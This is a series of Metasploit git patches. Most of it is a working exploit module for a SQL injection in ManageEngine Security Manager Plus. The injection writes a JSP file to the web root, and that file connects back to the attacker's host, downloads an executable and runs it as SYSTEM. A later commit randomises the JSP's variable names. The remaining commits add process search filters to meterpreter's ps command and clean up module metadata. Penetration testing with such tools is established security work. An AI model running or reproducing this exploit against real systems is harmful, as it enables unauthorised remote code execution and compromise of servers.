'win', + 'Targets' => + [ + # Win XP / 2003 / Vista / Win 7 / etc + ['Windows Universal', {}] + ], + 'Privileged' => false, + 'DisclosureDate' => "Oct 18 2012", + 'DefaultTarget' => 0)) + + register_options( + [ + OptPort.new('RPORT', [true, 'The target port', 6262]) + ], self.class) + end + + + # + # A very gentle check to see if Security Manager Plus exists or not + # + def check + res = send_request_raw({ + 'method' => 'GET', + 'uri' => '/SecurityManager.cc' + }) + + if res and res.body =~ /\Security Manager Plus\<\/title\>/ + return Exploit::CheckCode::Detected + else + return Exploit::CheckCode::Safe + end + end + + + # + # Remove the JSP once we get a shell. + # We cannot delete the executable because it will still be in use. + # + def on_new_session(cli) + if cli.type != 'meterpreter' + print_error("Meterpreter not used. Please manually remove #{@jsp_name + '.jsp'}") + return + end + + cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi") + + begin + print_warning("#{rhost}:#{rport} - Deleting: #{@jsp_name + '.jsp'}") + cli.fs.file.rm("../webapps/SecurityManager/#{@jsp_name + '.jsp'}") + print_good("#{rhost}:#{rport} - #{@jsp_name + '.jsp'} deleted") + rescue ::Exception => e + print_error("Unable to delete #{@jsp_name + '.jsp'}: #{e.message}") + end + end + + + # + # Transfer the malicious executable to our victim + # + def on_client_connect(cli) + print_status("#{cli.peerhost}:#{cli.peerport} - Sending executable (#{@native_payload.length} bytes)") + cli.put(@native_payload) + service.close_client(cli) + end + + + # + # Generate a download+exe JSP payload + # + def generate_jsp_payload + my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address("50.50.50.50") : datastore['SRVHOST'] + my_port = datastore['SRVPORT'] + + jsp = %Q| + <%@page import="java.io.*"%> + <%@page import="java.net.*"%> + <%@page import="sun.misc.BASE64Decoder"%> + + <% + StringBuffer buf = new StringBuffer(); + byte[] shellcode = null; + BufferedOutputStream outstream = null; + try { + Socket s = new Socket("#{my_host}", #{my_port}); + BufferedReader r = new BufferedReader(new InputStreamReader(s.getInputStream())); + while (buf.length() < #{@native_payload.length}) { + buf.append( (char) r.read()); + } + + BASE64Decoder decoder = new BASE64Decoder(); + shellcode = decoder.decodeBuffer(buf.toString()); + + File temp = File.createTempFile("#{@native_payload_name}", ".exe"); + String path = temp.getAbsolutePath(); + + outstream = new BufferedOutputStream(new FileOutputStream(path)); + outstream.write(shellcode); + outstream.close(); + + Process p = Runtime.getRuntime().exec(path); + } catch (Exception e) {} + %> + | + + jsp = jsp.gsub(/\n/, '') + jsp = jsp.gsub(/\t/, '') + + jsp.unpack("H*")[0] + end + + + # + # Run the actual exploit + # + def inject_exec + # This little lag is meant to ensure the TCP server runs first before the requests + select(nil, nil, nil, 1) + + # Inject our JSP payload + print_status("#{rhost}:#{rport} - Sending JSP payload") + pass = rand_text_alpha(rand(10)+5) + hex_jsp = generate_jsp_payload + + cookie = 'STATE_COOKIE=%26SecurityManager%2FID%2F174%2FHomePageSubDAC_LIST%2F223%2FSecurityManager_CONTENTAREA_LIST%2F226%2FMainDAC_LIST%2F166%26MainTabs%2FID%2F167%2F_PV%2F174%2FselectedView%2FHome%26Home%2FID%2F166%2FPDCA%2FMainDAC%2F_PV%2F174%26HomePageSub%2FID%2F226%2FPDCA%2FSecurityManager_CONTENTAREA%2F_PV%2F166%26HomePageSubTab%2FID%2F225%2F_PV%2F226%2FselectedView%2FHomePageSecurity%26HomePageSecurity%2FID%2F223%2FPDCA%2FHomePageSubDAC%2F_PV%2F226%26_REQS%2F_RVID%2FSecurityManager%2F_TIME%2F31337; 2RequestsshowThreadedReq=showThreadedReqshow; 2RequestshideThreadedReq=hideThreadedReqhide;' + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => '/STATE_ID/31337/jsp/xmlhttp/persistence.jsp?reqType=AdvanceSearch&SUBREQUEST=XMLHTTP', + 'headers' => { + 'Cookie' => cookie, + 'Accept-Encoding' => 'identity' + }, + 'vars_post' => { + 'ANDOR' => 'and', + 'condition_1' => 'OpenPorts@PORT', + 'operator_1' => 'IN', + 'value_1' => "1)) union select 0x#{hex_jsp},2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,21,22,23,24,25,26,27,28,29 into outfile #{@outpath} FROM mysql.user WHERE 1=((1", + 'COUNT' => '1' + } + }) + + print_status("#{rhost}:#{rport} - Sending /#{@jsp_name + '.jsp'}") + res = send_request_raw({ + 'method' => 'GET', + 'uri' => "/#{@jsp_name + '.jsp'}", + 'headers' => { + 'Cookie' => 'pwnage' + } + }) + + handler + end + + + # + # The server must start first, and then we send the malicious requests + # + def exploit + # Avoid passing this as an argument for performance reasons + # This is in base64 is make sure our file isn't mangled + @native_payload = [generate_payload_exe].pack("m*") + @native_payload_name = rand_text_alpha(rand(6)+3) + @jsp_name = rand_text_alpha(rand(6)+3) + @outpath = "\"../../webapps/SecurityManager/#{@jsp_name + '.jsp'}\"" + + begin + t = framework.threads.spawn("reqs", false) { inject_exec } + print_status("Serving executable on #{datastore['SRVHOST']}:#{datastore['SRVPORT']}") + super + ensure + t.kill + end + end +end \ No newline at end of file From 669d22c917926e0a7576ea5c11f069cbdb028979 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Tue, 23 Oct 2012 02:05:08 -0500 Subject: [PATCH 10/74] Final improvements --- .../windows/http/manage_engine_sqli.rb | 95 +++++++++++-------- 1 file changed, 58 insertions(+), 37 deletions(-) diff --git a/modules/exploits/windows/http/manage_engine_sqli.rb b/modules/exploits/windows/http/manage_engine_sqli.rb index 064c335731..7d22cb3ab0 100644 --- a/modules/exploits/windows/http/manage_engine_sqli.rb +++ b/modules/exploits/windows/http/manage_engine_sqli.rb @@ -21,21 +21,23 @@ class Metasploit3 < Msf::Exploit::Remote This module exploits a SQL injection found in ManageEngine Security Manager Plus advanced search page. It will send a malicious SQL query to create a JSP file under the web root directory, and then let it download and execute our malicious - executable under the context of SYSTEM. No authentication is necessary to exploit this. + executable under the context of SYSTEM. Authentication is not required in order + to exploit this vulnerability. }, 'License' => MSF_LICENSE, 'Author' => [ - 'xistence' # Discovery & Metasploit module + 'xistence ', # Discovery & Metasploit module + 'sinn3r' # Improved Metasploit module ], 'References' => [ - ['EDB','22094'] + ['EDB','22094'], + ['BID', '56138'] ], 'Platform' => 'win', 'Targets' => [ - # Win XP / 2003 / Vista / Win 7 / etc ['Windows Universal', {}] ], 'Privileged' => false, @@ -53,12 +55,9 @@ class Metasploit3 < Msf::Exploit::Remote # A very gentle check to see if Security Manager Plus exists or not # def check - res = send_request_raw({ - 'method' => 'GET', - 'uri' => '/SecurityManager.cc' - }) + res = send_request_raw({'uri' => '/SecurityManager.cc'}) - if res and res.body =~ /\Security Manager Plus\<\/title\>/ + if res and res.body =~ /\SecurityManager Plus\<\/title\>/ return Exploit::CheckCode::Detected else return Exploit::CheckCode::Safe @@ -72,7 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote # def on_new_session(cli) if cli.type != 'meterpreter' - print_error("Meterpreter not used. Please manually remove #{@jsp_name + '.jsp'}") + print_warning("Meterpreter not used. Please manually remove #{@jsp_name + '.jsp'}") return end @@ -105,33 +104,43 @@ class Metasploit3 < Msf::Exploit::Remote my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address("50.50.50.50") : datastore['SRVHOST'] my_port = datastore['SRVPORT'] + var_buf = Rex::Text.rand_text_alpha(rand(8) + 3) + var_shellcode = Rex::Text.rand_text_alpha(rand(8) + 3) + var_outstream = Rex::Text.rand_text_alpha(rand(8) + 3) + var_socket = Rex::Text.rand_text_alpha(rand(8) + 3) + var_bufreader = Rex::Text.rand_text_alpha(rand(8) + 3) + var_decoder = Rex::Text.rand_text_alpha(rand(8) + 3) + var_temp = Rex::Text.rand_text_alpha(rand(8) + 3) + var_path = Rex::Text.rand_text_alpha(rand(8) + 3) + var_proc = Rex::Text.rand_text_alpha(rand(8) + 3) + jsp = %Q| <%@page import="java.io.*"%> <%@page import="java.net.*"%> <%@page import="sun.misc.BASE64Decoder"%> <% - StringBuffer buf = new StringBuffer(); - byte[] shellcode = null; - BufferedOutputStream outstream = null; + StringBuffer #{var_buf} = new StringBuffer(); + byte[] #{var_shellcode} = null; + BufferedOutputStream #{var_outstream} = null; try { - Socket s = new Socket("#{my_host}", #{my_port}); - BufferedReader r = new BufferedReader(new InputStreamReader(s.getInputStream())); - while (buf.length() < #{@native_payload.length}) { - buf.append( (char) r.read()); + Socket #{var_socket} = new Socket("#{my_host}", #{my_port}); + BufferedReader #{var_bufreader} = new BufferedReader(new InputStreamReader(#{var_socket}.getInputStream())); + while (#{var_buf}.length() < #{@native_payload.length}) { + #{var_buf}.append( (char) #{var_bufreader}.read()); } - BASE64Decoder decoder = new BASE64Decoder(); - shellcode = decoder.decodeBuffer(buf.toString()); + BASE64Decoder #{var_decoder} = new BASE64Decoder(); + #{var_shellcode} = #{var_decoder}.decodeBuffer(#{var_buf}.toString()); - File temp = File.createTempFile("#{@native_payload_name}", ".exe"); - String path = temp.getAbsolutePath(); + File #{var_temp} = File.createTempFile("#{@native_payload_name}", ".exe"); + String #{var_path} = #{var_temp}.getAbsolutePath(); - outstream = new BufferedOutputStream(new FileOutputStream(path)); - outstream.write(shellcode); - outstream.close(); + #{var_outstream} = new BufferedOutputStream(new FileOutputStream(#{var_path})); + #{var_outstream}.write(#{var_shellcode}); + #{var_outstream}.close(); - Process p = Runtime.getRuntime().exec(path); + Process #{var_proc} = Runtime.getRuntime().exec(#{var_path}); } catch (Exception e) {} %> | @@ -151,36 +160,48 @@ class Metasploit3 < Msf::Exploit::Remote select(nil, nil, nil, 1) # Inject our JSP payload - print_status("#{rhost}:#{rport} - Sending JSP payload") - pass = rand_text_alpha(rand(10)+5) hex_jsp = generate_jsp_payload - cookie = 'STATE_COOKIE=%26SecurityManager%2FID%2F174%2FHomePageSubDAC_LIST%2F223%2FSecurityManager_CONTENTAREA_LIST%2F226%2FMainDAC_LIST%2F166%26MainTabs%2FID%2F167%2F_PV%2F174%2FselectedView%2FHome%26Home%2FID%2F166%2FPDCA%2FMainDAC%2F_PV%2F174%26HomePageSub%2FID%2F226%2FPDCA%2FSecurityManager_CONTENTAREA%2F_PV%2F166%26HomePageSubTab%2FID%2F225%2F_PV%2F226%2FselectedView%2FHomePageSecurity%26HomePageSecurity%2FID%2F223%2FPDCA%2FHomePageSubDAC%2F_PV%2F226%26_REQS%2F_RVID%2FSecurityManager%2F_TIME%2F31337; 2RequestsshowThreadedReq=showThreadedReqshow; 2RequestshideThreadedReq=hideThreadedReqhide;' + cookie = 'STATE_COOKIE=&' + cookie << 'SecurityManager/ID/174/HomePageSubDAC_LIST/223/SecurityManager_CONTENTAREA_LIST/226/MainDAC_LIST/166&' + cookie << 'MainTabs/ID/167/_PV/174/selectedView/Home&' + cookie << 'Home/ID/166/PDCA/MainDAC/_PV/174&' + cookie << 'HomePageSub/ID/226/PDCA/SecurityManager_CONTENTAREA/_PV/166&' + cookie << 'HomePageSubTab/ID/225/_PV/226/selectedView/HomePageSecurity&' + cookie << 'HomePageSecurity/ID/223/PDCA/HomePageSubDAC/_PV/226&' + cookie << '_REQS/_RVID/SecurityManager/_TIME/31337; ' + cookie << '2RequestsshowThreadedReq=showThreadedReqshow; ' + cookie << '2RequestshideThreadedReq=hideThreadedReqhide;' + rnd_num = Rex::Text.rand_text_numeric(1) + sqli = "#{rnd_num})) union select 0x#{hex_jsp}," + sqli << (2..28).map {|e| e} * "," + sqli << " into outfile #{@outpath} FROM mysql.user WHERE #{rnd_num}=((#{rnd_num}" + + state_id = Rex::Text.rand_text_numeric(5) + print_status("#{rhost}:#{rport} - Sending JSP payload") res = send_request_cgi({ 'method' => 'POST', - 'uri' => '/STATE_ID/31337/jsp/xmlhttp/persistence.jsp?reqType=AdvanceSearch&SUBREQUEST=XMLHTTP', + 'uri' => "/STATE_ID/#{state_id}/jsp/xmlhttp/persistence.jsp", 'headers' => { 'Cookie' => cookie, 'Accept-Encoding' => 'identity' }, + 'vars_get' => { + 'reqType' =>'AdvanceSearch', + 'SUBREQUEST' =>'XMLHTTP' + }, 'vars_post' => { 'ANDOR' => 'and', 'condition_1' => 'OpenPorts@PORT', 'operator_1' => 'IN', - 'value_1' => "1)) union select 0x#{hex_jsp},2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,21,22,23,24,25,26,27,28,29 into outfile #{@outpath} FROM mysql.user WHERE 1=((1", + 'value_1' => sqli, 'COUNT' => '1' } }) print_status("#{rhost}:#{rport} - Sending /#{@jsp_name + '.jsp'}") - res = send_request_raw({ - 'method' => 'GET', - 'uri' => "/#{@jsp_name + '.jsp'}", - 'headers' => { - 'Cookie' => 'pwnage' - } - }) + send_request_raw({'uri' => "/#{@jsp_name + '.jsp'}"}) handler end From e5ec51a78091ecf6b1c2e54e337cb0a823dca057 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Tue, 23 Oct 2012 02:05:55 -0500 Subject: [PATCH 11/74] Rename file for consistency --- .../http/{manage_engine_sqli.rb => manageengine_search_sqli.rb} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/exploits/windows/http/{manage_engine_sqli.rb => manageengine_search_sqli.rb} (100%) diff --git a/modules/exploits/windows/http/manage_engine_sqli.rb b/modules/exploits/windows/http/manageengine_search_sqli.rb similarity index 100% rename from modules/exploits/windows/http/manage_engine_sqli.rb rename to modules/exploits/windows/http/manageengine_search_sqli.rb From ef29f29c100138267dd7158d6ccd483b6f2c9ec8 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Wed, 29 Aug 2012 19:16:33 -0500 Subject: [PATCH 12/74] Adds a new findpids command to meterpreter findpids calls client.sys.process.get_processes like ps but then filters out any processes that do not match one of the process names supplied as arguments to the command. `findpids explorer.exe notepad.exe` will return all processes named explorer.exe or notepad.exe Allows for quick searching for the pid you want. ideal for migration --- .../console/command_dispatcher/stdapi/sys.rb | 30 +++++++++++++++++++ 1 file changed, 30 insertions(+) diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb index 138ea2eaab..4ce46c0e50 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb @@ -58,6 +58,7 @@ class Console::CommandDispatcher::Stdapi::Sys "getuid" => "Get the user that the server is running as", "kill" => "Terminate a process", "ps" => "List running processes", + "findpids" => "Find Processes by name", "reboot" => "Reboots the remote computer", "reg" => "Modify and interact with the remote registry", "rev2self" => "Calls RevertToSelf() on the remote machine", @@ -75,6 +76,7 @@ class Console::CommandDispatcher::Stdapi::Sys "getuid" => [ "stdapi_sys_config_getuid" ], "kill" => [ "stdapi_sys_process_kill" ], "ps" => [ "stdapi_sys_process_get_processes" ], + "findpids" => [ "stdapi_sys_process_get_processes" ], "reboot" => [ "stdapi_sys_power_exitwindows" ], "reg" => [ "stdapi_registry_load_key", @@ -284,6 +286,34 @@ class Console::CommandDispatcher::Stdapi::Sys return true end + def cmd_findpids(*args) + if args.empty? or args.include? "-h" + print_line "You must supply one or more process name to search for" + print_line "e.g. findpids explorer.exe notepad.exe" + return true + end + processes = client.sys.process.get_processes + if (processes.length == 0) + print_line("No running processes were found.") + else + searched_procs = Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessList.new + processes.each do |proc| + if args.include? proc["name"] + searched_procs << proc + end + end + searched_procs.compact! + if searched_procs.length == 0 + print_line("No running processes were found matching the supplied names.") + else + print_line + print_line(searched_procs.to_table("Indent" => 1).to_s) + print_line + end + end + return true + end + # # Reboots the remote computer. # From f13502033af2d7eb38777537b2bf1ff6ee31d4f6 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Thu, 6 Sep 2012 11:54:28 -0500 Subject: [PATCH 13/74] Built in regex support to findpids --- .../ui/console/command_dispatcher/stdapi/sys.rb | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb index 4ce46c0e50..26e8ac17cd 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb @@ -290,6 +290,7 @@ class Console::CommandDispatcher::Stdapi::Sys if args.empty? or args.include? "-h" print_line "You must supply one or more process name to search for" print_line "e.g. findpids explorer.exe notepad.exe" + print_line "You may also pass Regular Expressions: findpids *.svc.* *.dll.*" return true end processes = client.sys.process.get_processes @@ -298,8 +299,11 @@ class Console::CommandDispatcher::Stdapi::Sys else searched_procs = Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessList.new processes.each do |proc| - if args.include? proc["name"] - searched_procs << proc + args.each do |arg| + if proc["name"].match(/#{arg}/) + searched_procs << proc + break + end end end searched_procs.compact! From 52f3dfa81b4a2aa0d8c2d0f52fe25e9a381e6ae1 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Wed, 12 Sep 2012 08:26:31 -0500 Subject: [PATCH 14/74] Moved help text into cmd_findpids_help --- .../ui/console/command_dispatcher/stdapi/sys.rb | 10 +++++++--- 1 file changed, 7 insertions(+), 3 deletions(-) diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb index 26e8ac17cd..52e26561d1 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb @@ -288,9 +288,7 @@ class Console::CommandDispatcher::Stdapi::Sys def cmd_findpids(*args) if args.empty? or args.include? "-h" - print_line "You must supply one or more process name to search for" - print_line "e.g. findpids explorer.exe notepad.exe" - print_line "You may also pass Regular Expressions: findpids *.svc.* *.dll.*" + cmd_findpids_help return true end processes = client.sys.process.get_processes @@ -318,6 +316,12 @@ class Console::CommandDispatcher::Stdapi::Sys return true end + def cmd_findpids_help + print_line "You must supply one or more process name to search for" + print_line "e.g. findpids explorer.exe notepad.exe" + print_line "You may also pass Regular Expressions: findpids *.svc.* *.dll.*" + end + # # Reboots the remote computer. # From 1adfc0e070c302a2d39bc33ab1da5f0560fedb33 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Wed, 19 Sep 2012 08:28:36 -0500 Subject: [PATCH 15/74] rolled changes into existing ps command Some users requested this be added to the ps command via a -S opt instead of creating a new command. This limits the search to only one search parameter at a time but with the ability to pass RegEx I think that's fine --- .../console/command_dispatcher/stdapi/sys.rb | 66 +++++++++---------- 1 file changed, 30 insertions(+), 36 deletions(-) diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb index 52e26561d1..f3683f980a 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb @@ -45,6 +45,10 @@ class Console::CommandDispatcher::Stdapi::Sys "-r" => [ true, "The remote machine name to connect to (with current process credentials" ], "-w" => [ false, "Set KEY_WOW64 flag, valid values [32|64]." ]) + @@ps_opts = Rex::Parser::Arguments.new( + "-h" => [false, "Help menu."], + "-S" => [true, "RegEx term(s) to filter results with "]) + # # List of supported commands. # @@ -58,7 +62,6 @@ class Console::CommandDispatcher::Stdapi::Sys "getuid" => "Get the user that the server is running as", "kill" => "Terminate a process", "ps" => "List running processes", - "findpids" => "Find Processes by name", "reboot" => "Reboots the remote computer", "reg" => "Modify and interact with the remote registry", "rev2self" => "Calls RevertToSelf() on the remote machine", @@ -76,7 +79,6 @@ class Console::CommandDispatcher::Stdapi::Sys "getuid" => [ "stdapi_sys_config_getuid" ], "kill" => [ "stdapi_sys_process_kill" ], "ps" => [ "stdapi_sys_process_get_processes" ], - "findpids" => [ "stdapi_sys_process_get_processes" ], "reboot" => [ "stdapi_sys_power_exitwindows" ], "reg" => [ "stdapi_registry_load_key", @@ -276,6 +278,24 @@ class Console::CommandDispatcher::Stdapi::Sys # def cmd_ps(*args) processes = client.sys.process.get_processes + @@ps_opts.parse(args) do |opt, idx, val| + case opt + when "-h" + cmd_ps_help + return true + when "-S" + print_line "Performing Search..." + searched_procs = Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessList.new + processes.each do |proc| + if val.nil? or val.empty? + print_line "You must supply a search term!" + return false + end + searched_procs << proc if proc["name"].match(/#{val}/) + end + processes = searched_procs + end + end if (processes.length == 0) print_line("No running processes were found.") else @@ -286,40 +306,14 @@ class Console::CommandDispatcher::Stdapi::Sys return true end - def cmd_findpids(*args) - if args.empty? or args.include? "-h" - cmd_findpids_help - return true - end - processes = client.sys.process.get_processes - if (processes.length == 0) - print_line("No running processes were found.") - else - searched_procs = Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessList.new - processes.each do |proc| - args.each do |arg| - if proc["name"].match(/#{arg}/) - searched_procs << proc - break - end - end - end - searched_procs.compact! - if searched_procs.length == 0 - print_line("No running processes were found matching the supplied names.") - else - print_line - print_line(searched_procs.to_table("Indent" => 1).to_s) - print_line - end - end - return true - end - - def cmd_findpids_help - print_line "You must supply one or more process name to search for" - print_line "e.g. findpids explorer.exe notepad.exe" - print_line "You may also pass Regular Expressions: findpids *.svc.* *.dll.*" + def cmd_ps_help + print_line "Use the command with no arguments to see all running processes." + print_line "You may supply a search term to filter the results:" + print_line "\t ps -S explorer.exe" + print_line "\t Would return any processes named explorer.exe" + print_line "You may also pass Regular Expressions:" + print_line "\tps -S *.svc.* " + print_line "Would return any processes with 'svc' in the name" end # From 1fd4c8867cd49ac36522a84a0270e2f54618c851 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Fri, 21 Sep 2012 13:27:16 -0500 Subject: [PATCH 16/74] Add a bunch of extra filter options --- .../console/command_dispatcher/stdapi/sys.rb | 40 ++++++++++++++++++- 1 file changed, 38 insertions(+), 2 deletions(-) diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb index f3683f980a..152ef980bc 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb @@ -47,7 +47,10 @@ class Console::CommandDispatcher::Stdapi::Sys @@ps_opts = Rex::Parser::Arguments.new( "-h" => [false, "Help menu."], - "-S" => [true, "RegEx term(s) to filter results with "]) + "-S" => [true, "RegEx term to filter on process name with "], + "-A" => [true, "Arch to filter on (x86 or x86_64"], + "-s" =>[false, "Show only SYSTEM processes"], + "-U" => [true, "RegEx term to filter on user name with"]) # # List of supported commands. @@ -284,7 +287,7 @@ class Console::CommandDispatcher::Stdapi::Sys cmd_ps_help return true when "-S" - print_line "Performing Search..." + print_line "Filtering on process name..." searched_procs = Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessList.new processes.each do |proc| if val.nil? or val.empty? @@ -294,6 +297,36 @@ class Console::CommandDispatcher::Stdapi::Sys searched_procs << proc if proc["name"].match(/#{val}/) end processes = searched_procs + when "-A" + print_line "Filtering on arch..." + searched_procs = Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessList.new + processes.each do |proc| + next if proc['arch'].nil? or proc['arch'].empty? + if val.nil? or val.empty? or !(val == "x86" or val == "x86_64") + print_line "You must select either x86 or x86_64" + return false + end + searched_procs << proc if proc["arch"] == val + end + processes = searched_procs + when "-s" + print_line "Filtering on SYSTEM processes..." + searched_procs = Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessList.new + processes.each do |proc| + searched_procs << proc if proc["user"] == "NT AUTHORITY\\SYSTEM" + end + processes = searched_procs + when "-U" + print_line "Filtering on user name..." + searched_procs = Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessList.new + processes.each do |proc| + if val.nil? or val.empty? + print_line "You must supply a search term!" + return false + end + searched_procs << proc if proc["user"].match(/#{val}/) + end + processes = searched_procs end end if (processes.length == 0) @@ -316,6 +349,8 @@ class Console::CommandDispatcher::Stdapi::Sys print_line "Would return any processes with 'svc' in the name" end + + # # Reboots the remote computer. # @@ -627,6 +662,7 @@ class Console::CommandDispatcher::Stdapi::Sys client.sys.power.shutdown end + end end From 30bfa7cee6db4a3fd03dcd59941eaaba3daa5504 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Fri, 21 Sep 2012 13:45:09 -0500 Subject: [PATCH 17/74] Fix up the ps help --- .../console/command_dispatcher/stdapi/sys.rb | 23 ++++++++++++++----- 1 file changed, 17 insertions(+), 6 deletions(-) diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb index 152ef980bc..5e09ef8cd5 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb @@ -341,12 +341,23 @@ class Console::CommandDispatcher::Stdapi::Sys def cmd_ps_help print_line "Use the command with no arguments to see all running processes." - print_line "You may supply a search term to filter the results:" - print_line "\t ps -S explorer.exe" - print_line "\t Would return any processes named explorer.exe" - print_line "You may also pass Regular Expressions:" - print_line "\tps -S *.svc.* " - print_line "Would return any processes with 'svc' in the name" + print_line "The following options can be used to filter those results:" + + tbl = Rex::Ui::Text::Table.new( + 'Header' => "Options List", + 'Indent' => 1, + 'Columns' => + [ + "Option", + "Details" + ] + ) + + tbl << ["-s", "Display only SYSTEM processes"] + tbl << ["-S ", "Filters processes on the process name using the supplied RegEx"] + tbl << ["-A ", "Filters processes on the arch. (x86, x86_64)"] + tbl << ["-U ", "Filters processes on the user using the supplied RegEx"] + print_line tbl.to_s end From e94c68d85b00d2a91b18a9ee80464707e25e0b0b Mon Sep 17 00:00:00 2001 From: Michael Schierl Date: Mon, 22 Oct 2012 18:38:18 +0200 Subject: [PATCH 18/74] Author cleanup: One module did not have an author --- modules/exploits/osx/rtsp/quicktime_rtsp_content_type.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/osx/rtsp/quicktime_rtsp_content_type.rb b/modules/exploits/osx/rtsp/quicktime_rtsp_content_type.rb index 4f6ca6c41a..5d071eaf46 100644 --- a/modules/exploits/osx/rtsp/quicktime_rtsp_content_type.rb +++ b/modules/exploits/osx/rtsp/quicktime_rtsp_content_type.rb @@ -20,7 +20,7 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'MacOS X QuickTime RTSP Content-Type Overflow', # Description? - # Author? + 'Author' => 'unknown', 'Version' => '$Revision$', 'Platform' => 'osx', 'References' => From ece6d84e922555bfd4ebc90e25a837d52509839d Mon Sep 17 00:00:00 2001 From: Michael Schierl Date: Mon, 22 Oct 2012 19:45:27 +0200 Subject: [PATCH 19/74] Author cleanup: fix unmatched angle brackets --- modules/exploits/windows/ftp/sasser_ftpd_port.rb | 2 +- modules/post/multi/manage/multi_post.rb | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/windows/ftp/sasser_ftpd_port.rb b/modules/exploits/windows/ftp/sasser_ftpd_port.rb index e79017f398..90c2e0ac99 100644 --- a/modules/exploits/windows/ftp/sasser_ftpd_port.rb +++ b/modules/exploits/windows/ftp/sasser_ftpd_port.rb @@ -23,7 +23,7 @@ class Metasploit3 < Msf::Exploit::Remote This module exploits the FTP server component of the Sasser worm. By sending an overly long PORT command the stack can be overwritten. }, - 'Author' => [ 'valsmith [at] metasploit.com>', 'chamuco [at] gmail.com>', 'patrick' ], + 'Author' => [ '', '', 'patrick' ], 'Arch' => [ ARCH_X86 ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', diff --git a/modules/post/multi/manage/multi_post.rb b/modules/post/multi/manage/multi_post.rb index ac80e2283c..ef57b64601 100644 --- a/modules/post/multi/manage/multi_post.rb +++ b/modules/post/multi/manage/multi_post.rb @@ -29,7 +29,7 @@ class Metasploit3 < Msf::Post of the module against the sessions and validation of the options provided. }, 'License' => MSF_LICENSE, - 'Author' => [ 'carlos_perez[at]darkoperator.com>'], + 'Author' => [ ''], 'Version' => '$Revision$', 'Platform' => [ 'windows', 'unix', 'osx', 'linux', 'solaris' ], 'SessionTypes' => [ 'meterpreter','shell' ] From 2bb498c4b3ba8a147f70d212c0d9907853b91659 Mon Sep 17 00:00:00 2001 From: Michael Schierl Date: Mon, 22 Oct 2012 20:04:21 +0200 Subject: [PATCH 20/74] DisclosureDate cleanup: Try parsing all dates Fix all dates unparsable by `Date.strptime(value, '%b %d %Y')` --- modules/exploits/windows/local/ask.rb | 2 +- modules/exploits/windows/local/bypassuac.rb | 2 +- modules/exploits/windows/local/service_permissions.rb | 2 +- modules/exploits/windows/smtp/wmailserver.rb | 2 +- modules/post/windows/escalate/bypassuac.rb | 2 +- 5 files changed, 5 insertions(+), 5 deletions(-) diff --git a/modules/exploits/windows/local/ask.rb b/modules/exploits/windows/local/ask.rb index 88b377e56d..95009ac41d 100644 --- a/modules/exploits/windows/local/ask.rb +++ b/modules/exploits/windows/local/ask.rb @@ -38,7 +38,7 @@ class Metasploit3 < Msf::Exploit::Local 'References' => [ [ 'URL', 'http://www.room362.com/blog/2012/1/3/uac-user-assisted-compromise.html' ] ], - 'DisclosureDate'=> "Jan 3, 2012" + 'DisclosureDate'=> "Jan 3 2012" )) register_options([ diff --git 